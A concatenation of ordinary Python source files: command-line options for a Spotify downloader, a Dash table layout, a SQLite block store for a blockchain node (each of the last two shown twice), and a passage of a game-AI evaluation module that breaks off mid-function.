help="The client id to use when logging in to Spotify.",
)
# Add client secret argument
parser.add_argument(
"--client-secret",
default=DEFAULT_CONFIG["client_secret"],
help="The client secret to use when logging in to Spotify.",
)
# Add cache path argument
parser.add_argument(
"--cache-path",
type=str,
default=DEFAULT_CONFIG["cache_path"],
help="The path where spotipy cache file will be stored.",
)
# Add no cache argument
parser.add_argument(
"--no-cache",
action="store_true",
default=DEFAULT_CONFIG["no_cache"],
help="Disable caching.",
)
# Add cookie file argument
parser.add_argument(
"--cookie-file",
default=DEFAULT_CONFIG["cookie_file"],
help="Path to cookies file.",
)
def parse_ffmpeg_options(parser: _ArgumentGroup):
"""
Parse ffmpeg options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add ffmpeg executable argument
parser.add_argument(
"--ffmpeg",
default=DEFAULT_CONFIG["ffmpeg"],
help="The ffmpeg executable to use.",
)
# Add search threads argument
parser.add_argument(
"--threads",
default=DEFAULT_CONFIG["threads"],
type=int,
help="The number of threads to use when downloading songs.",
)
# Add constant bit rate argument
parser.add_argument(
"--bitrate",
choices=[
"8k",
"16k",
"24k",
"32k",
"40k",
"48k",
"64k",
"80k",
"96k",
"112k",
"128k",
"160k",
"192k",
"224k",
"256k",
"320k",
],
default=DEFAULT_CONFIG["bitrate"],
type=str.lower,
help="The constant bitrate to use for the output file.",
)
# Additional ffmpeg arguments
parser.add_argument(
"--ffmpeg-args",
type=str,
default=DEFAULT_CONFIG["ffmpeg_args"],
help="Additional ffmpeg arguments passed as a string.",
)
def parse_output_options(parser: _ArgumentGroup):
"""
Parse output options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add output format argument
parser.add_argument(
"--format",
choices=FFMPEG_FORMATS.keys(),
default=DEFAULT_CONFIG["format"],
help="The format to download the song in.",
)
# Add save file argument
parser.add_argument(
"--save-file",
type=str,
default=DEFAULT_CONFIG["save_file"],
help="The file to save/load the songs data from/to. It has to end with .spotdl",
required=len(sys.argv) > 1 and sys.argv[1] in ["save", "preload"],
)
# Add name format argument
parser.add_argument(
"--output",
type=str,
default=DEFAULT_CONFIG["output"],
help=f"Specify the downloaded file name format, available variables: {', '.join(VARS)}",
)
# Add m3u argument
parser.add_argument(
"--m3u",
type=str,
default=DEFAULT_CONFIG["m3u"],
help="Name of the m3u file to save the songs to.",
)
# Add overwrite argument
parser.add_argument(
"--overwrite",
choices={"force", "skip"},
default=DEFAULT_CONFIG["overwrite"],
help="Overwrite existing files.",
)
# Option to restrict filenames for easier handling in the shell
parser.add_argument(
"--restrict",
default=DEFAULT_CONFIG["restrict"],
help="Restrict filenames to ASCII only",
action="store_true",
)
# Option to print errors on exit, useful for long playlist
parser.add_argument(
"--print-errors",
default=DEFAULT_CONFIG["print_errors"],
help="Print errors (wrong songs, failed downloads etc) on exit, useful for long playlist",
action="store_true",
)
# Option to use sponsor block
parser.add_argument(
"--sponsor-block",
default=DEFAULT_CONFIG["sponsor_block"],
help="Use the sponsor block to download songs from yt/ytm.",
action="store_true",
)
def parse_misc_options(parser: _ArgumentGroup):
"""
Parse misc options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add verbose argument
parser.add_argument(
"--log-level",
choices=NAME_TO_LEVEL.keys(),
help="Select log level.",
)
# Add simple tui argument
parser.add_argument(
"--simple-tui",
action="store_true",
default=DEFAULT_CONFIG["simple_tui"],
help="Use a simple tui.",
)
# Add headless argument
parser.add_argument(
"--headless",
action="store_true",
default=DEFAULT_CONFIG["headless"],
help="Run in headless mode.",
)
def parse_other_options(parser: _ArgumentGroup):
"""
Parse other options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
parser.add_argument(
"--download-ffmpeg",
action="store_true",
help="Download ffmpeg to spotdl directory.",
)
parser.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file. This will overwrite current config if present.",
)
parser.add_argument(
"--check-for-updates", action="store_true", help="Check for new version."
)
parser.add_argument(
"--profile",
action="store_true",
help="Run in profile mode. Useful for debugging.",
)
parser.add_argument(
"--version",
"-v",
action="version",
help="Show the version number and exit.",
version=_version.__version__,
)
|
import dash
import dash_html_components as html
import dash_table
import pandas as pd
from app import app
#### GET DATA
dfAPI = pd.read_csv("freqs_data.csv")
#### LAYOUT
layout = html.Div(
[
html.H6(children="All records"),
html.Div(
[
dash_table.DataTable(
id="table2",
data=dfAPI.round(2).to_dict("records"),
columns=[
{"id": c, "name": c}
for c in [
# "data point",
"ref#",
"text type",
"value",
"freq",
"fpm",
"rel",
]
],
sort_action="native",
sort_mode="single",
filter_action="native",
page_action="native",
page_size=100,
style_table={
"overflowX": "scroll",
"maxHeight": "800px",
"overflowY": "scroll",
},
style_data={"whiteSpace": "normal", "height": "auto"},
style_cell={
"minWidth": "70px",
"maxWidth": "130px",
"overflow": "hidden",
"textOverflow": "ellipsis",
},
style_cell_conditional=[
{"if": {"column_id": "text type"}, "textAlign": "left"},
{"if": {"column_id": "value"}, "textAlign": "left"},
{"if": {"column_id": "ref#"}, "textAlign": "center"},
],
)
],
style={"width": "100%"},
),
]
)
| import dash
import dash_html_components as html
import dash_table
import pandas as pd
from app import app
#### GET DATA
dfAPI = pd.read_csv("freqs_data.csv")
#### LAYOUT
layout = html.Div(
[
html.H6(children="All records"),
html.Div(
[
dash_table.DataTable(
id="table2",
data=dfAPI.round(2).to_dict("records"),
columns=[
{"id": c, "name": c}
for c in [
# "data point",
"ref#",
"text type",
"value",
"freq",
"fpm",
"rel",
]
],
sort_action="native",
sort_mode="single",
filter_action="native",
page_action="native",
page_size=100,
style_table={
"overflowX": "scroll",
"maxHeight": "800px",
"overflowY": "scroll",
},
style_data={"whiteSpace": "normal", "height": "auto"},
style_cell={
"minWidth": "70px",
"maxWidth": "130px",
"overflow": "hidden",
"textOverflow": "ellipsis",
},
style_cell_conditional=[
{"if": {"column_id": "text type"}, "textAlign": "left"},
{"if": {"column_id": "value"}, "textAlign": "left"},
{"if": {"column_id": "ref#"}, "textAlign": "center"},
],
)
],
style={"width": "100%"},
),
]
)
|
import logging
from typing import Dict, List, Optional, Tuple
import aiosqlite
from bytecash.consensus.block_record import BlockRecord
from bytecash.types.blockchain_format.sized_bytes import bytes32
from bytecash.types.full_block import FullBlock
from bytecash.types.weight_proof import SubEpochChallengeSegment, SubEpochSegments
from bytecash.util.db_wrapper import DBWrapper
from bytecash.util.ints import uint32
from bytecash.util.lru_cache import LRUCache
log = logging.getLogger(__name__)
class BlockStore:
db: aiosqlite.Connection
block_cache: LRUCache
db_wrapper: DBWrapper
ses_challenge_cache: LRUCache
@classmethod
async def create(cls, db_wrapper: DBWrapper):
self = cls()
# All full blocks which have been added to the blockchain. Header_hash -> block
self.db_wrapper = db_wrapper
self.db = db_wrapper.db
await self.db.execute(
"CREATE TABLE IF NOT EXISTS full_blocks(header_hash text PRIMARY KEY, height bigint,"
" is_block tinyint, is_fully_compactified tinyint, block blob)"
)
# Block records
await self.db.execute(
"CREATE TABLE IF NOT EXISTS block_records(header_hash "
"text PRIMARY KEY, prev_hash text, height bigint,"
"block blob, sub_epoch_summary blob, is_peak tinyint, is_block tinyint)"
)
# todo remove in v1.2
await self.db.execute("DROP TABLE IF EXISTS sub_epoch_segments_v2")
# Sub epoch segments for weight proofs
await self.db.execute(
"CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(ses_block_hash text PRIMARY KEY, challenge_segments blob)"
)
# Height index so we can look up in order of height for sync purposes
await self.db.execute("CREATE INDEX IF NOT EXISTS full_block_height on full_blocks(height)")
await self.db.execute("CREATE INDEX IF NOT EXISTS is_fully_compactified on full_blocks(is_fully_compactified)")
await self.db.execute("CREATE INDEX IF NOT EXISTS height on block_records(height)")
if self.db_wrapper.allow_upgrades:
await self.db.execute("DROP INDEX IF EXISTS hh")
await self.db.execute("DROP INDEX IF EXISTS is_block")
await self.db.execute("DROP INDEX IF EXISTS peak")
await self.db.execute(
"CREATE INDEX IF NOT EXISTS is_peak_eq_1_idx on block_records(is_peak) where is_peak = 1"
)
else:
await self.db.execute("CREATE INDEX IF NOT EXISTS peak on block_records(is_peak) where is_peak = 1")
await self.db.commit()
self.block_cache = LRUCache(1000)
self.ses_challenge_cache = LRUCache(50)
return self
async def add_full_block(self, header_hash: bytes32, block: FullBlock, block_record: BlockRecord) -> None:
self.block_cache.put(header_hash, block)
cursor_1 = await self.db.execute(
"INSERT OR REPLACE INTO full_blocks VALUES(?, ?, ?, ?, ?)",
(
header_hash.hex(),
block.height,
int(block.is_transaction_block()),
int(block.is_fully_compactified()),
bytes(block),
),
)
await cursor_1.close()
cursor_2 = await self.db.execute(
"INSERT OR REPLACE INTO block_records VALUES(?, ?, ?, ?,?, ?, ?)",
(
header_hash.hex(),
block.prev_header_hash.hex(),
block.height,
bytes(block_record),
None
if block_record.sub_epoch_summary_included is None
else bytes(block_record.sub_epoch_summary_included),
False,
block.is_transaction_block(),
),
)
await cursor_2.close()
async def persist_sub_epoch_challenge_segments(
self, ses_block_hash: bytes32, segments: List[SubEpochChallengeSegment]
) -> None:
async with self.db_wrapper.lock:
cursor_1 = await self.db.execute(
"INSERT OR REPLACE INTO sub_epoch_segments_v3 VALUES(?, ?)",
(ses_block_hash.hex(), bytes(SubEpochSegments(segments))),
)
await cursor_1.close()
await self.db.commit()
async def get_sub_epoch_challenge_segments(
self,
ses_block_hash: bytes32,
) -> Optional[List[SubEpochChallengeSegment]]:
cached = self.ses_challenge_cache.get(ses_block_hash)
if cached is not None:
return cached
cursor = await self.db.execute(
"SELECT challenge_segments from sub_epoch_segments_v3 WHERE ses_block_hash=?", (ses_block_hash.hex(),)
)
row = await cursor.fetchone()
await cursor.close()
if row is not None:
challenge_segments = SubEpochSegments.from_bytes(row[0]).challenge_segments
self.ses_challenge_cache.put(ses_block_hash, challenge_segments)
return challenge_segments
return None
def rollback_cache_block(self, header_hash: bytes32):
try:
self.block_cache.remove(header_hash)
except KeyError:
# this is best effort. When rolling back, we may not have added the
# block to the cache yet
pass
async def get_full_block(self, header_hash: bytes32) -> Optional[FullBlock]:
cached = self.block_cache.get(header_hash)
if cached is not None:
log.debug(f"cache hit for block {header_hash.hex()}")
return cached
log.debug(f"cache miss for block {header_hash.hex()}")
cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
block = FullBlock.from_bytes(row[0])
self.block_cache.put(header_hash, block)
return block
return None
async def get_full_block_bytes(self, header_hash: bytes32) -> Optional[bytes]:
cached = self.block_cache.get(header_hash)
if cached is not None:
log.debug(f"cache hit for block {header_hash.hex()}")
return bytes(cached)
log.debug(f"cache miss for block {header_hash.hex()}")
cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
return row[0]
return None
async def get_full_blocks_at(self, heights: List[uint32]) -> List[FullBlock]:
if len(heights) == 0:
return []
heights_db = tuple(heights)
formatted_str = f'SELECT block from full_blocks WHERE height in ({'?,' * (len(heights_db) - 1)}?)'
cursor = await self.db.execute(formatted_str, heights_db)
rows = await cursor.fetchall()
await cursor.close()
return [FullBlock.from_bytes(row[0]) for row in rows]
async def get_block_records_by_hash(self, header_hashes: List[bytes32]):
"""
Returns a list of Block Records, ordered by the same order in which header_hashes are passed in.
Throws an exception if the blocks are not present
"""
if len(header_hashes) == 0:
return []
header_hashes_db = tuple([hh.hex() for hh in header_hashes])
formatted_str = f'SELECT block from block_records WHERE header_hash in ({'?,' * (len(header_hashes_db) - 1)}?)'
cursor = await self.db.execute(formatted_str, header_hashes_db)
rows = await cursor.fetchall()
await cursor.close()
all_blocks: Dict[bytes32, BlockRecord] = {}
for row in rows:
block_rec: BlockRecord = BlockRecord.from_bytes(row[0])
all_blocks[block_rec.header_hash] = block_rec
ret: List[BlockRecord] = []
for hh in header_hashes:
if hh not in all_blocks:
raise ValueError(f"Header hash {hh} not in the blockchain")
ret.append(all_blocks[hh])
return ret
async def get_blocks_by_hash(self, header_hashes: List[bytes32]) -> List[FullBlock]:
"""
Returns a list of Full Blocks blocks, ordered by the same order in which header_hashes are passed in.
Throws an exception if the blocks are not present
"""
if len(header_hashes) == 0:
return []
header_hashes_db = tuple([hh.hex() for hh in header_hashes])
formatted_str = (
f'SELECT header_hash, block from full_blocks WHERE header_hash in ({'?,' * (len(header_hashes_db) - 1)}?)'
)
cursor = await self.db.execute(formatted_str, header_hashes_db)
rows = await cursor.fetchall()
await cursor.close()
all_blocks: Dict[bytes32, FullBlock] = {}
for row in rows:
header_hash = bytes.fromhex(row[0])
full_block: FullBlock = FullBlock.from_bytes(row[1])
# TODO: address hint error and remove ignore
# error: Invalid index type "bytes" for "Dict[bytes32, FullBlock]"; expected type "bytes32" [index]
all_blocks[header_hash] = full_block # type: ignore[index]
self.block_cache.put(header_hash, full_block)
ret: List[FullBlock] = []
for hh in header_hashes:
if hh not in all_blocks:
raise ValueError(f"Header hash {hh} not in the blockchain")
ret.append(all_blocks[hh])
return ret
async def get_block_record(self, header_hash: bytes32) -> Optional[BlockRecord]:
cursor = await self.db.execute(
"SELECT block from block_records WHERE header_hash=?",
(header_hash.hex(),),
)
row = await cursor.fetchone()
await cursor.close()
if row is not None:
return BlockRecord.from_bytes(row[0])
return None
async def get_block_records_in_range(
self,
start: int,
stop: int,
) -> Dict[bytes32, BlockRecord]:
"""
Returns a dictionary with all blocks in range between start and stop
if present.
"""
formatted_str = f"SELECT header_hash, block from block_records WHERE height >= {start} and height <= {stop}"
cursor = await self.db.execute(formatted_str)
rows = await cursor.fetchall()
await cursor.close()
ret: Dict[bytes32, BlockRecord] = {}
for row in rows:
header_hash = bytes.fromhex(row[0])
# TODO: address hint error and remove ignore
# error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32" [index]
ret[header_hash] = BlockRecord.from_bytes(row[1]) # type: ignore[index]
return ret
async def get_block_records_close_to_peak(
self, blocks_n: int
) -> Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]:
"""
Returns a dictionary with all blocks that have height >= peak height - blocks_n, as well as the
peak header hash.
"""
res = await self.db.execute("SELECT * from block_records WHERE is_peak = 1")
peak_row = await res.fetchone()
await res.close()
if peak_row is None:
return {}, None
formatted_str = f"SELECT header_hash, block from block_records WHERE height >= {peak_row[2] - blocks_n}"
cursor = await self.db.execute(formatted_str)
rows = await cursor.fetchall()
await cursor.close()
ret: Dict[bytes32, BlockRecord] = {}
for row in rows:
header_hash = bytes.fromhex(row[0])
# TODO: address hint error and remove ignore
# error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32" [index]
ret[header_hash] = BlockRecord.from_bytes(row[1]) # type: ignore[index]
# TODO: address hint error and remove ignore
# error: Incompatible return value type (got "Tuple[Dict[bytes32, BlockRecord], bytes]", expected
# "Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]") [return-value]
return ret, bytes.fromhex(peak_row[0]) # type: ignore[return-value]
async def set_peak(self, header_hash: bytes32) -> None:
# We need to be in a sqlite transaction here.
# Note: we do not commit this to the database yet, as we need to also change the coin store
cursor_1 = await self.db.execute("UPDATE block_records SET is_peak=0 WHERE is_peak=1")
await cursor_1.close()
cursor_2 = await self.db.execute(
"UPDATE block_records SET is_peak=1 WHERE header_hash=?",
(header_hash.hex(),),
)
await cursor_2.close()
async def is_fully_compactified(self, header_hash: bytes32) -> Optional[bool]:
cursor = await self.db.execute(
"SELECT is_fully_compactified from full_blocks WHERE header_hash=?", (header_hash.hex(),)
)
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return bool(row[0])
async def get_random_not_compactified(self, number: int) -> List[int]:
# Since orphan blocks do not get compactified, we need to check whether all blocks with a
# certain height are not compact. And if we do have compact orphan blocks, then all that
# happens is that the occasional chain block stays uncompact - not ideal, but harmless.
cursor = await self.db.execute(
f"SELECT height FROM full_blocks GROUP BY height HAVING sum(is_fully_compactified)=0 "
f"ORDER BY RANDOM() LIMIT {number}"
)
rows = await cursor.fetchall()
await cursor.close()
heights = []
for row in rows:
heights.append(int(row[0]))
return heights
| import logging
from typing import Dict, List, Optional, Tuple
import aiosqlite
from bytecash.consensus.block_record import BlockRecord
from bytecash.types.blockchain_format.sized_bytes import bytes32
from bytecash.types.full_block import FullBlock
from bytecash.types.weight_proof import SubEpochChallengeSegment, SubEpochSegments
from bytecash.util.db_wrapper import DBWrapper
from bytecash.util.ints import uint32
from bytecash.util.lru_cache import LRUCache
log = logging.getLogger(__name__)
class BlockStore:
db: aiosqlite.Connection
block_cache: LRUCache
db_wrapper: DBWrapper
ses_challenge_cache: LRUCache
@classmethod
async def create(cls, db_wrapper: DBWrapper):
self = cls()
# All full blocks which have been added to the blockchain. Header_hash -> block
self.db_wrapper = db_wrapper
self.db = db_wrapper.db
await self.db.execute(
"CREATE TABLE IF NOT EXISTS full_blocks(header_hash text PRIMARY KEY, height bigint,"
" is_block tinyint, is_fully_compactified tinyint, block blob)"
)
# Block records
await self.db.execute(
"CREATE TABLE IF NOT EXISTS block_records(header_hash "
"text PRIMARY KEY, prev_hash text, height bigint,"
"block blob, sub_epoch_summary blob, is_peak tinyint, is_block tinyint)"
)
# todo remove in v1.2
await self.db.execute("DROP TABLE IF EXISTS sub_epoch_segments_v2")
# Sub epoch segments for weight proofs
await self.db.execute(
"CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(ses_block_hash text PRIMARY KEY, challenge_segments blob)"
)
# Height index so we can look up in order of height for sync purposes
await self.db.execute("CREATE INDEX IF NOT EXISTS full_block_height on full_blocks(height)")
await self.db.execute("CREATE INDEX IF NOT EXISTS is_fully_compactified on full_blocks(is_fully_compactified)")
await self.db.execute("CREATE INDEX IF NOT EXISTS height on block_records(height)")
if self.db_wrapper.allow_upgrades:
await self.db.execute("DROP INDEX IF EXISTS hh")
await self.db.execute("DROP INDEX IF EXISTS is_block")
await self.db.execute("DROP INDEX IF EXISTS peak")
await self.db.execute(
"CREATE INDEX IF NOT EXISTS is_peak_eq_1_idx on block_records(is_peak) where is_peak = 1"
)
else:
await self.db.execute("CREATE INDEX IF NOT EXISTS peak on block_records(is_peak) where is_peak = 1")
await self.db.commit()
self.block_cache = LRUCache(1000)
self.ses_challenge_cache = LRUCache(50)
return self
async def add_full_block(self, header_hash: bytes32, block: FullBlock, block_record: BlockRecord) -> None:
self.block_cache.put(header_hash, block)
cursor_1 = await self.db.execute(
"INSERT OR REPLACE INTO full_blocks VALUES(?, ?, ?, ?, ?)",
(
header_hash.hex(),
block.height,
int(block.is_transaction_block()),
int(block.is_fully_compactified()),
bytes(block),
),
)
await cursor_1.close()
cursor_2 = await self.db.execute(
"INSERT OR REPLACE INTO block_records VALUES(?, ?, ?, ?,?, ?, ?)",
(
header_hash.hex(),
block.prev_header_hash.hex(),
block.height,
bytes(block_record),
None
if block_record.sub_epoch_summary_included is None
else bytes(block_record.sub_epoch_summary_included),
False,
block.is_transaction_block(),
),
)
await cursor_2.close()
async def persist_sub_epoch_challenge_segments(
self, ses_block_hash: bytes32, segments: List[SubEpochChallengeSegment]
) -> None:
async with self.db_wrapper.lock:
cursor_1 = await self.db.execute(
"INSERT OR REPLACE INTO sub_epoch_segments_v3 VALUES(?, ?)",
(ses_block_hash.hex(), bytes(SubEpochSegments(segments))),
)
await cursor_1.close()
await self.db.commit()
async def get_sub_epoch_challenge_segments(
self,
ses_block_hash: bytes32,
) -> Optional[List[SubEpochChallengeSegment]]:
cached = self.ses_challenge_cache.get(ses_block_hash)
if cached is not None:
return cached
cursor = await self.db.execute(
"SELECT challenge_segments from sub_epoch_segments_v3 WHERE ses_block_hash=?", (ses_block_hash.hex(),)
)
row = await cursor.fetchone()
await cursor.close()
if row is not None:
challenge_segments = SubEpochSegments.from_bytes(row[0]).challenge_segments
self.ses_challenge_cache.put(ses_block_hash, challenge_segments)
return challenge_segments
return None
def rollback_cache_block(self, header_hash: bytes32):
try:
self.block_cache.remove(header_hash)
except KeyError:
# this is best effort. When rolling back, we may not have added the
# block to the cache yet
pass
async def get_full_block(self, header_hash: bytes32) -> Optional[FullBlock]:
cached = self.block_cache.get(header_hash)
if cached is not None:
log.debug(f"cache hit for block {header_hash.hex()}")
return cached
log.debug(f"cache miss for block {header_hash.hex()}")
cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
block = FullBlock.from_bytes(row[0])
self.block_cache.put(header_hash, block)
return block
return None
async def get_full_block_bytes(self, header_hash: bytes32) -> Optional[bytes]:
cached = self.block_cache.get(header_hash)
if cached is not None:
log.debug(f"cache hit for block {header_hash.hex()}")
return bytes(cached)
log.debug(f"cache miss for block {header_hash.hex()}")
cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
return row[0]
return None
async def get_full_blocks_at(self, heights: List[uint32]) -> List[FullBlock]:
if len(heights) == 0:
return []
heights_db = tuple(heights)
formatted_str = f'SELECT block from full_blocks WHERE height in ({"?," * (len(heights_db) - 1)}?)'
cursor = await self.db.execute(formatted_str, heights_db)
rows = await cursor.fetchall()
await cursor.close()
return [FullBlock.from_bytes(row[0]) for row in rows]
async def get_block_records_by_hash(self, header_hashes: List[bytes32]):
"""
Returns a list of Block Records, ordered by the same order in which header_hashes are passed in.
Throws an exception if the blocks are not present
"""
if len(header_hashes) == 0:
return []
header_hashes_db = tuple([hh.hex() for hh in header_hashes])
formatted_str = f'SELECT block from block_records WHERE header_hash in ({"?," * (len(header_hashes_db) - 1)}?)'
cursor = await self.db.execute(formatted_str, header_hashes_db)
rows = await cursor.fetchall()
await cursor.close()
all_blocks: Dict[bytes32, BlockRecord] = {}
for row in rows:
block_rec: BlockRecord = BlockRecord.from_bytes(row[0])
all_blocks[block_rec.header_hash] = block_rec
ret: List[BlockRecord] = []
for hh in header_hashes:
if hh not in all_blocks:
raise ValueError(f"Header hash {hh} not in the blockchain")
ret.append(all_blocks[hh])
return ret
async def get_blocks_by_hash(self, header_hashes: List[bytes32]) -> List[FullBlock]:
"""
Returns a list of Full Blocks blocks, ordered by the same order in which header_hashes are passed in.
Throws an exception if the blocks are not present
"""
if len(header_hashes) == 0:
return []
header_hashes_db = tuple([hh.hex() for hh in header_hashes])
formatted_str = (
f'SELECT header_hash, block from full_blocks WHERE header_hash in ({"?," * (len(header_hashes_db) - 1)}?)'
)
cursor = await self.db.execute(formatted_str, header_hashes_db)
rows = await cursor.fetchall()
await cursor.close()
all_blocks: Dict[bytes32, FullBlock] = {}
for row in rows:
header_hash = bytes.fromhex(row[0])
full_block: FullBlock = FullBlock.from_bytes(row[1])
# TODO: address hint error and remove ignore
# error: Invalid index type "bytes" for "Dict[bytes32, FullBlock]"; expected type "bytes32" [index]
all_blocks[header_hash] = full_block # type: ignore[index]
self.block_cache.put(header_hash, full_block)
ret: List[FullBlock] = []
for hh in header_hashes:
if hh not in all_blocks:
raise ValueError(f"Header hash {hh} not in the blockchain")
ret.append(all_blocks[hh])
return ret
async def get_block_record(self, header_hash: bytes32) -> Optional[BlockRecord]:
cursor = await self.db.execute(
"SELECT block from block_records WHERE header_hash=?",
(header_hash.hex(),),
)
row = await cursor.fetchone()
await cursor.close()
if row is not None:
return BlockRecord.from_bytes(row[0])
return None
async def get_block_records_in_range(
self,
start: int,
stop: int,
) -> Dict[bytes32, BlockRecord]:
"""
Returns a dictionary with all blocks in range between start and stop
if present.
"""
formatted_str = f"SELECT header_hash, block from block_records WHERE height >= {start} and height <= {stop}"
cursor = await self.db.execute(formatted_str)
rows = await cursor.fetchall()
await cursor.close()
ret: Dict[bytes32, BlockRecord] = {}
for row in rows:
header_hash = bytes.fromhex(row[0])
# TODO: address hint error and remove ignore
# error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32" [index]
ret[header_hash] = BlockRecord.from_bytes(row[1]) # type: ignore[index]
return ret
async def get_block_records_close_to_peak(
self, blocks_n: int
) -> Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]:
"""
Returns a dictionary with all blocks that have height >= peak height - blocks_n, as well as the
peak header hash.
"""
res = await self.db.execute("SELECT * from block_records WHERE is_peak = 1")
peak_row = await res.fetchone()
await res.close()
if peak_row is None:
return {}, None
formatted_str = f"SELECT header_hash, block from block_records WHERE height >= {peak_row[2] - blocks_n}"
cursor = await self.db.execute(formatted_str)
rows = await cursor.fetchall()
await cursor.close()
ret: Dict[bytes32, BlockRecord] = {}
for row in rows:
header_hash = bytes.fromhex(row[0])
# TODO: address hint error and remove ignore
# error: Invalid index type "bytes" for "Dict[bytes32, BlockRecord]"; expected type "bytes32" [index]
ret[header_hash] = BlockRecord.from_bytes(row[1]) # type: ignore[index]
# TODO: address hint error and remove ignore
# error: Incompatible return value type (got "Tuple[Dict[bytes32, BlockRecord], bytes]", expected
# "Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]") [return-value]
return ret, bytes.fromhex(peak_row[0]) # type: ignore[return-value]
async def set_peak(self, header_hash: bytes32) -> None:
# We need to be in a sqlite transaction here.
# Note: we do not commit this to the database yet, as we need to also change the coin store
cursor_1 = await self.db.execute("UPDATE block_records SET is_peak=0 WHERE is_peak=1")
await cursor_1.close()
cursor_2 = await self.db.execute(
"UPDATE block_records SET is_peak=1 WHERE header_hash=?",
(header_hash.hex(),),
)
await cursor_2.close()
async def is_fully_compactified(self, header_hash: bytes32) -> Optional[bool]:
cursor = await self.db.execute(
"SELECT is_fully_compactified from full_blocks WHERE header_hash=?", (header_hash.hex(),)
)
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return bool(row[0])
async def get_random_not_compactified(self, number: int) -> List[int]:
# Since orphan blocks do not get compactified, we need to check whether all blocks with a
# certain height are not compact. And if we do have compact orphan blocks, then all that
# happens is that the occasional chain block stays uncompact - not ideal, but harmless.
cursor = await self.db.execute(
f"SELECT height FROM full_blocks GROUP BY height HAVING sum(is_fully_compactified)=0 "
f"ORDER BY RANDOM() LIMIT {number}"
)
rows = await cursor.fetchall()
await cursor.close()
heights = []
for row in rows:
heights.append(int(row[0]))
return heights
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from typing import Iterator, Tuple, List, Callable, Optional, Dict
import torch
import tube
from pytube.data_channel_manager import DataChannelManager
from .params import GameParams, EvalParams, ExecutionParams
from . import utils
from .env_creation_helpers import (
sanitize_game_params,
create_model,
create_game,
create_player,
)
#######################################################################################
# PLOTTER CREATION
#######################################################################################
def create_plotter(eval_params: EvalParams) -> utils.Plotter:
checkpoint_dir = eval_params.checkpoint_dir
if checkpoint_dir[-1] == "/":
checkpoint_dir = checkpoint_dir[:-1]
plot_env = os.path.basename(checkpoint_dir)
return utils.Plotter(
plot_enabled=eval_params.plot_enabled,
env=plot_env,
server=eval_params.plot_server,
port=eval_params.plot_port,
)
#######################################################################################
# CHECKPOINT ITERATOR CREATION
#######################################################################################
def create_checkpoint_iter(eval_params: EvalParams, only_last: bool = False):
if eval_params.checkpoint_dir is not None:
return utils.gen_checkpoints(
checkpoint_dir=eval_params.checkpoint_dir,
real_time=eval_params.real_time and not only_last,
only_last=only_last,
)
else:
return [utils.load_checkpoint(eval_params.checkpoint)]
#######################################################################################
# OPPONENT MODEL AND DEVICE CREATION
#######################################################################################
def create_models_and_devices_opponent(
eval_params: EvalParams
) -> Tuple[List[torch.jit.ScriptModule], List[torch.device], GameParams]:
devices_opponent = [
torch.device(device_opponent) for device_opponent in eval_params.device_opponent
]
checkpoint_opponent = utils.load_checkpoint(eval_params.checkpoint_opponent)
model_state_dict_opponent = checkpoint_opponent["model_state_dict"]
game_params_opponent = checkpoint_opponent["game_params"]
sanitize_game_params(game_params_opponent)
model_params_opponent = checkpoint_opponent["model_params"]
models_opponent = []
for device_opponent in devices_opponent:
model_opponent = create_model(
game_params=game_params_opponent,
model_params=model_params_opponent,
resume_training=False,
).to(device_opponent)
remove = []
for k, v in model_state_dict_opponent.items():
if "training" in k:
remove.append(k)
for k in remove:
model_state_dict_opponent.pop(k)
model_opponent.load_state_dict(model_state_dict_opponent)
model_opponent.eval()
models_opponent.append(model_opponent)
return models_opponent, devices_opponent, game_params_opponent
#######################################################################################
# EVALUATION ENVIRONMENT CREATION
#######################################################################################
def create_evaluation_environment(
seed_generator: Iterator[int],
game_params: GameParams,
eval_params: EvalParams,
current_batch_size: int = None,
pure_mcts_eval: bool = False,
pure_mcts_opponent: bool = True,
num_evaluated_games: int = 0
) -> Tuple[
tube.Context,
Optional[tube.DataChannel],
Optional[tube.DataChannel],
Callable[[], List[int]],
]:
num_game = eval_params.num_game_eval
num_actor_eval = eval_params.num_actor_eval
num_rollouts_eval = eval_params.num_rollouts_eval
num_actor_opponent = eval_params.num_actor_opponent
num_rollouts_opponent = eval_params.num_rollouts_opponent
first_hand = []
second_hand = []
games = []
context = tube.Context()
actor_channel_eval = (
None
if pure_mcts_eval
else tube.DataChannel("act_eval", num_game * num_actor_eval, 1)
)
actor_channel_opponent = (
None
if pure_mcts_opponent
else tube.DataChannel("act_opponent", num_game * num_actor_opponent, 1)
)
for game_no in range(current_batch_size if current_batch_size else num_game):
game = create_game(
game_params, num_episode=1, seed=next(seed_generator), eval_mode=True
)
player = create_player(
seed_generator=seed_generator,
game=game,
player="mcts",
num_actor=num_actor_eval,
num_rollouts=num_rollouts_eval,
pure_mcts=pure_mcts_eval,
actor_channel=actor_channel_eval,
model_manager=None,
human_mode=False,
sample_before_step_idx=8,
randomized_rollouts=False,
sampling_mcts=False,
)
